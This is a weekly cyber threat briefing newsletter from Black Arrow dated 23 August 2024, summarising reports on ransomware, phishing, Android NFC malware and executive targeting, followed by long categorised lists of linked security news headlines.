Black Arrow Cyber Threat Briefing 23 August 2024
Black Arrow Cyber Threat Intelligence Briefing 23 August 2024:
-Why C-Suite Leaders Are Prime Cyber Targets
-Most Ransomware Attacks Occur Between 1am and 5am When Security Staff are Asleep,
Study Finds
-Companies are Not as Resilient as They Think, Cyber Resilience Overestimation Leads to Business Continuity Issues, Ransom Payments
-Third of Firms Put Money Aside to Pay Cyber Ransoms
-AI-Powered Cyber Threats Are Too Overpowering for Over 50% of Security Teams
-Five Novel Email Phishing Attacks and What to Do About Them
-NFC Traffic Stealer Targets Android Users and Their Banking Info
-91% of Cyber Attacks Targeted Multiple Organisations Using Mass Scanning to Uncover and Exploit Vulnerabilities
-You Really Need to Stop Using Work Laptops for Personal Use. Here's Why
-Human Nature is Causing Our Cyber Security Problem
-Cyber Crime Consolidation: The Big Fish Are Getting Bigger
-Why End of Life for Applications Is the Beginning of Life for Hackers
-Beyond Prevention: Why Breach Readiness Is Your Cyber Security Lifeline
Welcome to this week’s Black Arrow Cyber Threat Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Top Cyber Stories of the Last Week
Why C-Suite Leaders Are Prime Cyber Targets
A recent report by GetApp reveals that 72% of surveyed cyber security professionals have observed cyber attacks targeting senior executives in the past 18 months, with incidents involving AI-generated deepfakes in 27% of cases. Despite this growing threat, 37% of companies globally do not provide specialised cyber security training for their top leaders, leaving a significant vulnerability. The report also notes a sharp rise in attack frequency, with 69% of US companies experiencing increased attacks over the past three years, higher than the global average. Over half of US firms reported at least one identity fraud incident affecting a senior executive, highlighting the urgent need for enhanced cyber security strategies, including ongoing training and advanced security tools.
Most Ransomware Attacks Occur Between 1am and 5am When Security Staff are Asleep, Study Finds
The 2024 ThreatDown State of Ransomware report by Malwarebytes reveals that ransomware attacks are increasingly timed to exploit periods when security professionals are off-duty, with most incidents occurring between 1 am and 5 am. The report highlights a 33% global increase in ransomware attacks over the past year, with the UK experiencing a 67% rise and the US a 63% increase. Traditional response measures to ransomware are proving inadequate, as threat actors now move rapidly to compromise networks. This stresses the need for continuous security coverage to keep pace with evolving ransomware tactics.
Companies are Not as Resilient as They Think, Cyber Resilience Overestimation Leads to Business Continuity Issues, Ransom Payments
Cohesity’s Global Cyber Resilience Report 2024 reveals a worrying disconnect between organisations' confidence in their cyber resilience strategies and the reality of escalating cyber threats. The survey of over 3,100 IT and security decision-makers across eight countries found that 67% of respondents had fallen victim to a ransomware attack in 2024, with 69% admitting to paying a ransom, despite 77% of these organisations having a "do not pay" policy. While 78% expressed confidence in their resilience strategies, an overwhelming 96% acknowledged that the threat to their industry had increased or would increase this year, with many willing to pay over $1 million to recover data.
Third of Firms Put Money Aside to Pay Cyber Ransoms
A recent survey reveals that nearly a third of businesses have set aside funds specifically to pay ransoms in the event of a ransomware attack, reflecting the growing threat landscape. The survey found that half of the companies had suffered a ransomware breach in the past year, with one in three admitting to paying a ransom. Additionally, 31% of businesses reported severe impacts from cyber security incidents, either within their organisation or supply chain. Despite these challenges, 29% of respondents expect a successful cyber attack in the next year, with medium-to-large enterprises planning to invest an average of €1.18 million in cyber security, although a significant portion still feel their defences are outdated.
AI-Powered Cyber Threats Are Too Overpowering for Over 50% of Security Teams
A recent report by Absolute Security reveals that over half (54%) of UK Chief Information Security Officers (CISOs) feel their security teams are unprepared for emerging AI-powered threats. The Absolute Security United Kingdom CISO Cyber Resilience Report 2024, which surveyed 250 CISOs, highlights growing concerns about the impact of AI on cyber resilience. Nearly half (46%) view AI as more of a threat than a benefit to their organisation's security. Additionally, 39% of CISOs have personally stopped using AI due to cyber breach concerns, and 44% have banned AI use by employees for the same reason. The findings underscore the need for enhanced strategies to address AI-driven cyber risks.
Five Novel Email Phishing Attacks and What to Do About Them
Phishing attacks are continuing to grow in sophistication, driven by AI and evolving techniques. Notably, "pastejacking" tricks victims into running malicious code via copied commands, while phishing through Google Drawings exploits the tool's perceived safety to steal personal data. Cyber criminals are also abusing URL protection services, re-writing URLs to bypass security checks. A new trend blends spear phishing with mass phishing, using AI to personalise large-scale attacks. Real-time phishing, which bypasses two-factor authentication, is now widespread, with ready-made kits available on dark web markets, illustrating the growing complexity and reach of modern phishing tactics.
NFC Traffic Stealer Targets Android Users and Their Banking Info
ESET has uncovered a new Android malware named NGate, capable of cloning contactless payment data from physical credit and debit cards, posing significant risks of fraudulent transactions. This malware, the first of its kind observed in the wild, is based on NFCgate, a legitimate tool developed by students at Germany's University of Darmstadt for research purposes. NGate exploits NFCgate’s ability to capture and relay near-field communication (NFC) traffic, extending the range of contactless communication. Threat actors are using this capability alongside phishing and social engineering tactics to steal funds via fraudulent ATM transactions.
91% of Cyber Attacks Targeted Multiple Organisations Using Mass Scanning to Uncover and Exploit Vulnerabilities
The latest "Fastly Threat Insights Report" highlights a significant rise in cyber attacks, with 91% now targeting multiple organisations by scanning them online en-mass, up from 69% in 2023. The report, based on data from Fastly’s Network Learning Exchange, reveals that 36% of global internet traffic originates from bots, with short-lived IP addresses being used by attackers to evade detection. Notably, the High-Tech sector remains the top target, accounting for 37% of attacks. Fastly's findings underscore the need for adaptive security measures, as attackers increasingly exploit vulnerabilities across a broader range of targets using advanced techniques.
You Really Need to Stop Using Work Laptops for Personal Use. Here's Why
A recent study by ESET has revealed that 90% of employees use their company-provided laptops for personal activities, creating significant cyber security risks. Risky behaviours, such as viewing adult content and connecting to unsecured public Wi-Fi, were particularly common among younger workers. ESET attributes these risks to the shift towards hybrid and remote work, urging companies to enhance security measures for corporate devices and to educate employees on safe practices. These findings emphasised the need for stronger endpoint security.
Human Nature is Causing Our Cyber Security Problem
A recent analysis highlights the persistent challenge of cyber attacks, now the most significant threat to businesses, yet many organisations continue to delay adopting necessary security measures. This reluctance is attributed to a motivational deficit rooted in temporal discounting—a human tendency to prioritise immediate gratification over long-term benefits. Despite the severe consequences of security breaches and increasing regulatory pressures, organisations often procrastinate on implementing modern processes and critical tools. The article suggests that, much like automatic enrolment in retirement plans has increased participation, similar mechanisms are needed to combat procrastination and improve cyber security practices.
Cyber Crime Consolidation: The Big Fish Are Getting Bigger
A recent report by Chainalysis reveals that cyber criminals seized $16.7 billion in illicit funds during the first half of 2024, a 20% drop from the previous year, marking the fourth consecutive annual decline. Despite this overall decrease, large-scale crypto heists nearly doubled to $1.58 billion, and ransomware payments reached $459.8 million, a 2% increase from the same period last year. The median ransom payment has surged from under $200,000 in early 2023 to $1.5 million by mid-2024, reflecting a shift towards targeting larger organisations and critical infrastructure. The year is on track to be the highest-grossing for ransomware, despite disruptions to major gangs like ALPHV/BlackCat and LockBit.
Why End of Life for Applications Is the Beginning of Life for Hackers
A recent analysis highlights the significant cyber security risks posed by aging software, with over 35,000 applications set to reach end-of-life status in the next year. End-of-life software may still receive critical security patches, but end-of-support applications will no longer receive any updates, making them prime targets for threat actors. Chief Information Security Officers (CISOs) face challenges in securing backing for updates, particularly when applications are tied to outdated hardware or unsupported vendors. The Apache Log4j vulnerability exemplifies the dangers of neglecting software updates. Effective risk management requires proactive planning to address these aging software assets before they become significant vulnerabilities.
Beyond Prevention: Why Breach Readiness Is Your Cyber Security Lifeline
A recent analysis underscores the limitations of breach prevention strategies in the evolving cyber security landscape. Despite significant investments in firewalls, endpoint detection and response (EDR) and intrusion detection systems, the increasing sophistication of cyber threats has rendered breaches almost inevitable. The high number of recent breaches highlights that prevention alone is insufficient to protect critical business processes and data. Organisations must shift from relying solely on prevention to adopting a resilience-by-design approach, ensuring that they can continue operations even in the face of an attack. This proactive stance is essential to address the growing capabilities of cyber criminals.
Sources:
https://www.helpnetsecurity.com/2024/08/22/c-suite-leaders-prime-cyber-targets/
https://www.techrepublic.com/article/ransomware-trends-malwarebytes/
https://www.insurancejournal.com/news/national/2024/08/22/789621.htm
https://www.scmagazine.com/perspective/five-novel-email-phishing-attacks-and-what-to-do-about-them
https://cybernews.com/security/cybercrime-consolidation-big-fish-getting-bigger/
Governance, Risk and Compliance
Why C-suite leaders are prime cyber targets - Help Net Security
What is digital executive protection and how does it work? | CSO Online
The Cyber Security Paradox: Why Free Costs Too Much | HackerNoon
72% of cyber security leaders faced a cyber attack in last 18 months | Security Magazine
Cyber crime consolidation: the big fish are getting bigger | Cybernews
Companies aren’t as cyber resilient as they think | CIO Dive
Human Nature Is Causing Our Cyber Security Problem (darkreading.com)
You really need to stop using work laptops for personal use — here's why | TechRadar
Beyond prevention: Why breach readiness is your cyber security lifeline (securitybrief.co.nz)
CISOs list human error as their top cyber security risk (securityintelligence.com)
Cyber Resilience Lacking, Organisations Overconfident - Security Boulevard
3 CIO lessons for maximizing cyber security investments | CIO Dive
Strategies for security leaders: Building a positive cyber security culture - Help Net Security
The influence of optimism bias and loss aversion in cyber risk management decisions (techxplore.com)
Governance, Risk and Compliance: The Current Context | MSSP Alert
CISOs on the Hook: SEC Tightens Cyber security Disclosures (govinfosecurity.com)
Threats
Ransomware, Extortion and Destructive Attacks
Why Are Organisations Losing the Ransomware Battle? (darkreading.com)
Ransomware Surge Exploits Cyber security Gaps Caused by M&A - Security Boulevard
Ransomware Victims Paid $460 Million in First Half of 2024 - SecurityWeek
Ransomware Trends: Most Attacks Hit Between 1am and 5am, Study Finds (techrepublic.com)
Cyber Resilience Lacking, Organisations Overconfident - Security Boulevard
Cyber Crime Goes Corporate As Ransomware Gangs Want More (pymnts.com)
Ransomware on track for record profits, even as fewer victims pay | SC Media (scmagazine.com)
Third of firms put money aside to pay cyber ransoms (rte.ie)
Ransomware attacks rise 20% in July, industrial sectors hit hardest (securitybrief.co.nz)
Ransomware Attack Proceeds, Crypto Theft Rise in First Half | MSSP Alert
No honour among ransomware thieves: affiliates' trust craters after takedown (computing.co.uk)
Tracing the destructive path of ransomware's evolution (betanews.com)
Ransomware attacks rise over 60 percent (betanews.com)
Dodging the Cyber Bullet: Early Signs of a Ransomware Attack - IT Security Guru
Q2’24 marks second highest quarter for ransomware attacks, says Corvus - Reinsurance News
RansomHub Rolls Out Brand-New, EDR-Killing BYOVD Binary (darkreading.com)
Chainalysis: Illicit Crypto Activity Down 20%, Stolen Funds and Ransomware Up | Cryptoglobe
Why you need to know about ransomware | Malwarebytes
Critical industries top ransomware hitlist, attacks dwindle • The Register
Understanding the 'Morphology' of Ransomware: A Deeper Dive - SecurityWeek
U.S. charges Karakurt extortion gang’s “cold case” negotiator (bleepingcomputer.com)
Qilin Targets Chrome-Stored Credentials In “Troubling” New Attack (informationsecuritybuzz.com)
The changing dynamics of ransomware as law enforcement strikes - Help Net Security
Ransomware Victims
How the ransomware attack at Change Healthcare went down: A timeline | TechCrunch
Top US oilfield firm Halliburton hit by cyber attack, source says (yahoo.com)
Halliburton Suffers Cyber Attack | Houston Press
Medibank's data breach costs anticipated to reach $126m by mid-2025 - Security - iTnews
AutoCanada Hit by Cyber Attack - SecurityWeek
Three councils fall victim to cyber-attack (themj.co.uk)
CDK Global antitrust lawsuit leads to $100 million payout for car dealers (qz.com)
Top architectural firm reveals it was hit by major ransomware attack | TechRadar
Phishing & Email Based Attacks
The evolving threat landscape: Staying ahead of phishing attack trends | TechRadar
Five novel email phishing attacks – and what to do about them | SC Media (scmagazine.com)
The cyber attack cycle: First comes outage, next comes phishing (securityintelligence.com)
New NGate Android malware uses NFC chip to steal credit card data (bleepingcomputer.com)
NFC Traffic Stealer Targets Android Users & Their Banking Info (darkreading.com)
Western, Russian Civil Society Targeted in Sophisticated Phishing Attacks - SecurityWeek
Abnormal sees 350% uptick in phishing via file-sharing sites (securitybrief.co.nz)
Cyber criminals exploit file sharing services to advance phishing attacks - Help Net Security
Android and iOS users targeted with novel banking app phishing campaign | Cybernews
Android & iOS Users Targeted with New Phishing Attack Using PWAs & WebAPKs (cybersecuritynews.com)
Anatomy of an Attack (thehackernews.com)
This sophisticated new phishing campaign is going after US government contractors | TechRadar
Iran named as source of Trump campaign phish, leaks • The Register
Blind Eagle Hackers Exploit Spear-Phishing to Deploy RATs in Latin America (thehackernews.com)
Other Social Engineering
New NGate Android malware uses NFC chip to steal credit card data (bleepingcomputer.com)
NFC Traffic Stealer Targets Android Users & Their Banking Info (darkreading.com)
How Hackers Use Emergency Data Requests to Steal User Data (govinfosecurity.com)
Artificial Intelligence
AI-powered cyber threats are too overpowering for over 50% of security teams - IT Security Guru
Protecting against AI-enabled cyber crime | Professional Security
73% of orgs embracing gen AI, but far fewer are assessing risks | VentureBeat
Fraud tactics and the growing prevalence of AI scams - Help Net Security
xAI’s new Grok image generator floods X with controversial AI fakes - The Verge
Could AI be your company’s Achilles heel? - Raconteur
Deepfakes Are Having a Deeper Impact on These Three Industries (techspective.net)
Organisations turn to biometrics to counter deepfakes - Help Net Security
Artificial intelligence, real anxiety: Why we can't stop worrying and love AI | ZDNET
Microsoft Copilot Studio Vulnerability Led to Information Disclosure - SecurityWeek
OpenAI kills Iranian accounts spreading US election disinfo • The Register
2FA/MFA
The Silver Bullet of MFA Was Never Enough (darkreading.com)
Microsoft Mandates MFA for All Azure Sign-Ins - Infosecurity Magazine (infosecurity-magazine.com)
Malware
Russian Hackers Using Fake Brand Sites to Spread DanaBot and StealC Malware (thehackernews.com)
Cyber criminals launch new malware that can completely wipe out your antivirus | TechRadar
This new threat proves that Macs aren't immune from malware | Digital Trends
Azure domains and Google abused to spread disinformation and malware (bleepingcomputer.com)
New Russian threat targets over 100 Apple macOS browser extensions | Fox News
Beyond the wail: deconstructing the BANSHEE infostealer — Elastic Security Labs
Styx Stealer Malware Stealing Browser And Instant Messenger Data (cybersecuritynews.com)
5 Emerging Malware Variants You Must Be Aware Of (informationsecuritybuzz.com)
Cyber criminals Exploit Popular Software Searches to Spread FakeBat Malware (thehackernews.com)
Massive infostealer campaign exploits legitimate brands | SC Media (scmagazine.com)
Hackers Exploit PHP Vulnerability to Deploy Stealthy Msupedge Backdoor (thehackernews.com)
Hackers deployed new malware against university in Taiwan (therecord.media)
New macOS Malware TodoSwift Linked to North Korean Hacking Groups (thehackernews.com)
Chinese Threat Actors Use MSI Files to Bypass Windows, VT Detection (darkreading.com)
Hackers may have found an entirely new way to backdoor into Windows systems | TechRadar
Infostealers Waltz Through macOS to Grab Crypto Wallets, Browser Creds (darkreading.com)
New macOS Malware "Cthulhu Stealer" Targets Apple Users' Data (thehackernews.com)
Two Years On, Log4Shell Vulnerability Still Being Exploited to Deploy Malware - SecurityWeek
Chinese Hackers Exploit Zero-Day Cisco Switch Flaw to Gain System Control (thehackernews.com)
Iranian Cyber Group TA453 Targets Jewish Leader with New AnvilEcho Malware (thehackernews.com)
Multi-Stage ValleyRAT Targets Chinese Users with Advanced Tactics (thehackernews.com)
Has my PC been hacked? 5 ways to detect virus attacks, step-by-step | PCWorld
Blind Eagle Hackers Exploit Spear-Phishing to Deploy RATs in Latin America (thehackernews.com)
Mobile
New NGate Android malware uses NFC chip to steal credit card data (bleepingcomputer.com)
Google Pixels Carry Verizon App Doubling As a Backdoor (darkreading.com)
NFC Traffic Stealer Targets Android Users & Their Banking Info (darkreading.com)
Android & iOS Users Targeted with New Phishing Attack Using PWAs & WebAPKs (cybersecuritynews.com)
Czech Mobile Users Targeted in New Banking Credential Theft Scheme (thehackernews.com)
Does Your Smartphone Need An Antivirus App? - TechRound
Denial of Service/DoS/DDOS
Average DDoS attack costs $6,000 per minute - Help Net Security
Moscow detains scientist suspected of carrying out DDoS attacks on Russia (therecord.media)
Russia blames mass tech outages on DDoS attack | TechRadar
49% of DDoS attacks targeted gaming organisations | Security Magazine
Internet of Things – IoT
Russia fears Ukraine hijacking home CCTV systems for intel • The Register
Data Breaches/Leaks
The saga of the National Public Data Social Security number leak continues - The Verge
Thousands of Oracle NetSuite sites said to be exposing customer data | SC Media (scmagazine.com)
Florida data broker says it was ransacked by cyber-thieves • The Register
The Slow-Burn Nightmare of the National Public Data Breach | WIRED
FlightAware admits passwords, SSNs exposed for over 3 years • The Register
How Hackers Use Emergency Data Requests to Steal User Data (govinfosecurity.com)
Security flaws in Microsoft's Health Bot put patient data at risk (computing.co.uk)
Apple Prototypes and Corporate Secrets Are for Sale Online—If You Know Where to Look | WIRED
Organised Crime & Criminal Actors
Cyber crime consolidation: the big fish are getting bigger | Cybernews
Researchers Uncover New Infrastructure Tied to FIN7 Cyber crime Group (thehackernews.com)
Digital wallets can allow purchases with stolen credit cards • The Register
Kim Dotcom: 5 outrageous moments from the internet’s anti-hero (thenextweb.com)
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Ransomware Attack Proceeds, Crypto Theft Rise in First Half | MSSP Alert
Hackers linked to $14M Holograph crypto heist arrested in Italy (bleepingcomputer.com)
Digital wallets can allow purchases with stolen credit cards • The Register
Chainalysis: Illicit Crypto Activity Down 20%, Stolen Funds and Ransomware Up | Cryptoglobe
Infostealers Waltz Through macOS to Grab Crypto Wallets, Browser Creds (darkreading.com)
Unicoin recovers from G-Suite raid, hints at data woes • The Register
PostgreSQL databases under attack - Help Net Security
11 Cyber security Risks for NFT Buyers | HackerNoon
Insider Risk and Insider Threats
You really need to stop using work laptops for personal use — here's why | TechRadar
CISOs list human error as their top cyber security risk (securityintelligence.com)
Human Nature Is Causing Our Cyber security Problem (darkreading.com)
Insurance
Supply Chain and Third Parties
Three councils fall victim to cyber-attack (themj.co.uk)
Cloud/SaaS
Survey Surfaces Growing SaaS Application Security Concerns - Security Boulevard
45% of tech leaders have experienced a SaaS cyber security incident | Security Magazine
Cloud Misconfigurations Expose 110,000 Domains to Extortion in Widespread Campaign - SecurityWeek
The Hidden Security Gaps in Your SaaS Apps: Are You Doing Due Diligence? (thehackernews.com)
Azure domains and Google abused to spread disinformation and malware (bleepingcomputer.com)
Cyber criminals exploit file sharing services to advance phishing attacks - Help Net Security
It's Time To Untangle the SaaS Ball of Yarn (thehackernews.com)
8 cloud security gotchas most CISOs miss | CSO Online
The Hidden Security Gaps in Your SaaS Apps: Are You Doing Due Diligence? - Security Boulevard
Some major firms are being targeted by this dangerous new cyber crime campaign | TechRadar
GitHub Enterprise Server vulnerable to critical auth bypass flaw (bleepingcomputer.com)
Microsoft Mandates MFA for All Azure Sign-Ins - Infosecurity Magazine (infosecurity-magazine.com)
Thousands of Apps Using AWS ALB Exposed to Attacks Due to Configuration Issue - SecurityWeek
Azure Kubernetes Services Vulnerability Exposed Sensitive Information - SecurityWeek
Authentication bypass discovered in Microsoft Entra ID | Security Magazine
North Korean Hackers Pivot Away From Public Cloud (inforisktoday.com)
Outages
The cyber attack cycle: First comes outage, next comes phishing (securityintelligence.com)
CrowdStrike hits out at rivals’ ‘shady’ attacks after global IT outage
CrowdStrike outage lessons learned: Questions to ask vendors | TechTarget
CrowdStrike deja vu for IT admins with 'performance issue' • The Register
Post Office systems crash hits 'collapsing' Horizon system | Computer Weekly
Encryption
Some major firms are being targeted by this dangerous new cyber crime campaign | TechRadar
How SSH Flaws Expose Vulnerabilities, Endanger Enterprises (inforisktoday.com)
Linux and Open Source
Don't panic! It's only 60 Linux CVE security bulletins a week | ZDNET
PostgreSQL databases under attack - Help Net Security
Passwords, Credential Stuffing & Brute Force Attacks
The saga of the National Public Data Social Security number leak continues - The Verge
Some major firms are being targeted by this dangerous new cyber crime campaign | TechRadar
Qilin Targets Chrome-Stored Credentials In “Troubling” New Attack (informationsecuritybuzz.com)
Czech Mobile Users Targeted in New Banking Credential Theft Scheme (thehackernews.com)
Social Media
NFC Traffic Stealer Targets Android Users & Their Banking Info (darkreading.com)
How Hackers Use Emergency Data Requests to Steal User Data (govinfosecurity.com)
Training, Education and Awareness
The Cyber Security Paradox: Why Free Costs Too Much | HackerNoon
What's Typically the Weakest Point in a Business's Cyber Security? - Root-Nation.com
The worst security test ever? University slammed over fake Ebola scare as phishing test | TechRadar
Regulations, Fines and Legislation
Cisco wants United Nations to revisit cyber crime Convention • The Register
Cyber security Is Everywhere: ENISA COO - GovInfoSecurity
EU Directive Network and Information Security (NIS2): Modernizing security compliance (betanews.com)
CISOs on the Hook: SEC Tightens Cyber security Disclosures (govinfosecurity.com)
FAA Proposes New Aircraft Cyber security Rules - Infosecurity Magazine (infosecurity-magazine.com)
Models, Frameworks and Standards
ISO 27001 vs NIST: The Differences and How They Overlap - Security Boulevard
EU Directive Network and Information Security (NIS2): Modernizing security compliance (betanews.com)
Careers, Working in Cyber and Information Security
British civil service to target cyber specialists with new graduate scheme (therecord.media)
Law Enforcement Action and Take Downs
Hackers linked to $14M Holograph crypto heist arrested in Italy (bleepingcomputer.com)
National Crime Agency threatens extraditions over rise in sextortion cases (yahoo.com)
U.S. charges Karakurt extortion gang’s “cold case” negotiator (bleepingcomputer.com)
No honour among ransomware thieves: affiliates' trust craters after takedown (computing.co.uk)
Misinformation, Disinformation and Propaganda
FBI says Iranian hackers are targeting both presidential campaigns (engadget.com)
Are 2024 US Political Campaigns Prepared for Coming Cyber Threats? (darkreading.com)
Azure domains and Google abused to spread disinformation and malware (bleepingcomputer.com)
Meet the Iranian cyber attackers suspected of trying to hack the U.S. election - Washington Times
US warns of Iranian hackers escalating influence operations (bleepingcomputer.com)
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Nation State Actors
Are 2024 US Political Campaigns Prepared for Coming Cyber Threats? (darkreading.com)
China
US lawmakers urge probe into TP-Link over fears of possible cyber attacks | TechRadar
Chinese Threat Actors Use MSI Files to Bypass Windows, VT Detection (darkreading.com)
Chinese Hackers Exploit Zero-Day Cisco Switch Flaw to Gain System Control (thehackernews.com)
Hackers deployed new malware against university in Taiwan (therecord.media)
Multi-Stage ValleyRAT Targets Chinese Users with Advanced Tactics (thehackernews.com)
Russia
Russian Hackers Using Fake Brand Sites to Spread DanaBot and StealC Malware (thehackernews.com)
Western, Russian Civil Society Targeted in Sophisticated Phishing Attacks - SecurityWeek
Cyber attack hits Monobank, Ukraine's largest direct bank (kyivindependent.com)
Ukraine subjected to novel malware attack | SC Media (scmagazine.com)
Russia fears Ukraine hijacking home CCTV systems for intel • The Register
Moscow detains scientist suspected of carrying out DDoS attacks on Russia (therecord.media)
Russia blames mass tech outages on DDoS attack | TechRadar
Iran
Meet the Iranian cyber attackers suspected of trying to hack the U.S. election - Washington Times
FBI says Iranian hackers are targeting both presidential campaigns (engadget.com)
Iran named as source of Trump campaign phish, leaks • The Register
Iranian Cyber Group TA453 Targets Jewish Leader with New AnvilEcho Malware (thehackernews.com)
OpenAI kills Iranian accounts spreading US election disinfo • The Register
Iran and Israel are already engaged in a fierce cyberwar (economist.com)
North Korea
New macOS Malware TodoSwift Linked to North Korean Hacking Groups (thehackernews.com)
North Korean Hackers Pivot Away From Public Cloud (inforisktoday.com)
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
Tools and Controls
Ransomware Gangs Introduce New EDR-Killing Tool (informationsecuritybuzz.com)
73% of orgs embracing gen AI, but far fewer are assessing risks | VentureBeat
The Cyber security Paradox: Why Free Costs Too Much | HackerNoon
Cyber Resilience Lacking, Organisations Overconfident - Security Boulevard
Beyond prevention: Why breach readiness is your cyber security lifeline (securitybrief.co.nz)
The Silver Bullet of MFA Was Never Enough (darkreading.com)
Cyber criminals launch new malware that can completely wipe out your antivirus | TechRadar
Common API security issues: From exposed secrets to unauthorized access - Help Net Security
Organisations turn to biometrics to counter deepfakes - Help Net Security
Cyber criminals exploit file sharing services to advance phishing attacks - Help Net Security
This system can sort real pictures from AI fakes — why aren’t platforms using it? - The Verge
RansomHub Rolls Out Brand-New, EDR-Killing BYOVD Binary (darkreading.com)
How Pen Testing is Evolving and Where it’s Headed Next - Security Boulevard
Cyber security and Physical Security Go Hand-in-Hand | HHS.gov
3 lessons for maximizing cyber security investments | CIO Dive
The influence of optimism bias and loss aversion in cyber risk management decisions (techxplore.com)
What's Typically the Weakest Point in a Business's Cyber Security? - Root-Nation.com
How SSH Flaws Expose Vulnerabilities, Endanger Enterprises (inforisktoday.com)
Are virtual machines safe for end users? | TechTarget
AI for application security: Balancing automation with human oversight - Help Net Security
EDR vs. MDR vs. XDR: Key differences | TechTarget
Top Cyber security Risk Mitigation Strategies Every Business Should Implement (cybersaint.io)
Other News
72% of cyber security leaders faced a cyber attack in last 18 months | Security Magazine
72% of Senior Executives Targeted by Cyber attacks in the Last 18 Months | Business Wire
Sitting Ducks Attack: Over 1M Domains At Risk Of Takeover! - Security Boulevard
How Hollywood hacking scenes turn cyber security into entertainment (globenewswire.com)
Browser Syncing Is Useful, but Be Aware of These 4 Security Issues (makeuseof.com)
36% of global internet traffic originated from bots | Security Magazine
How might the UK's cyber landscape change under Labour? | Computer Weekly
Are the New FAA Cyber Requirements for Future Planes Enough? (govinfosecurity.com)
Preparing the IT Infrastructure For the Next Era of Cyber attacks | Entrepreneur
Switzerland to join European Cyber Security Organisation (aa.com.tr)
Protecting connected, self-driving vehicles from hackers (techxplore.com)
Empowering SMBs On The Path To Cyber security Maturity (forbes.com)
Olympics were case in point of cyber threat to global sport (emergingrisks.co.uk)
Africa's Economies Feel Pain of Cyber security Deficit (darkreading.com)
Food security: Accelerating national protections around critical infrastructure - Help Net Security
Security Alert: U.K. Political Donation Sites at Risk - Security Boulevard
Vulnerability Management
Fastly report reveals 91% of cyber attacks now target multiple organisations - SiliconANGLE
Why End of Life for Applications Is the Beginning of Life for Hackers (darkreading.com)
The Fundamentals of Vulnerability Management Explained | MSSP Alert
What's Typically the Weakest Point in a Business's Cyber Security? - Root-Nation.com
How SSH Flaws Expose Vulnerabilities, Endanger Enterprises (inforisktoday.com)
Vulnerability prioritization is only the beginning - Help Net Security
Vulnerabilities
PoC Exploit Released for Windows 0-Day Downgrade Attack (cybersecuritynews.com)
Google fixes ninth Chrome zero-day exploited in attacks this year (bleepingcomputer.com)
If You Have an AMD CPU, You Must Install This Vital Security Update (makeuseof.com)
Microsoft shares workaround for Outlook crashing after opening (bleepingcomputer.com)
Kubernetes Vulnerability Exposes Clusters to Command Injection Attacks (cybersecuritynews.com)
Windows 0-Day Flaw Exploited by Lazarus to Gain Unauthorized Access (cybersecuritynews.com)
Serious flaws in Microsoft apps on macOS could let hackers spy on users | ITPro
Hackers Exploit PHP Vulnerability to Deploy Stealthy Msupedge Backdoor (thehackernews.com)
F5 Patches High-Severity Vulnerabilities in BIG-IP, NGINX Plus - SecurityWeek
Symantec warns of new sophisticated backdoor exploiting patched PHP vulnerability - SiliconANGLE
AMD changes its mind, says it will patch more Ryzen chips against security flaw | TechRadar
Authentication bypass discovered in Microsoft Entra ID | Security Magazine
Thousands of Apps Using AWS ALB Exposed to Attacks Due to Configuration Issue - SecurityWeek
Security flaws in Microsoft's Health Bot put patient data at risk (computing.co.uk)
Microsoft Patches Critical Copilot Studio Vulnerability Exposing Sensitive Data (thehackernews.com)
Chinese Hackers Exploit Zero-Day Cisco Switch Flaw to Gain System Control (thehackernews.com)
Atlassian Patches Vulnerabilities in Bamboo, Confluence, Crowd, Jira - SecurityWeek
SolarWinds left hardcoded credentials in helpdesk product • The Register
Azure Kubernetes Services Vulnerability Exposed Sensitive Information - SecurityWeek
Litespeed Cache bug exposes millions of WordPress sites to takeover attacks (bleepingcomputer.com)
GitHub Enterprise Server vulnerable to critical auth bypass flaw (bleepingcomputer.com)
Critical Flaw in Donation Plugin Exposed 100,000 WordPress Sites to Takeover - SecurityWeek
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
As usual, contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.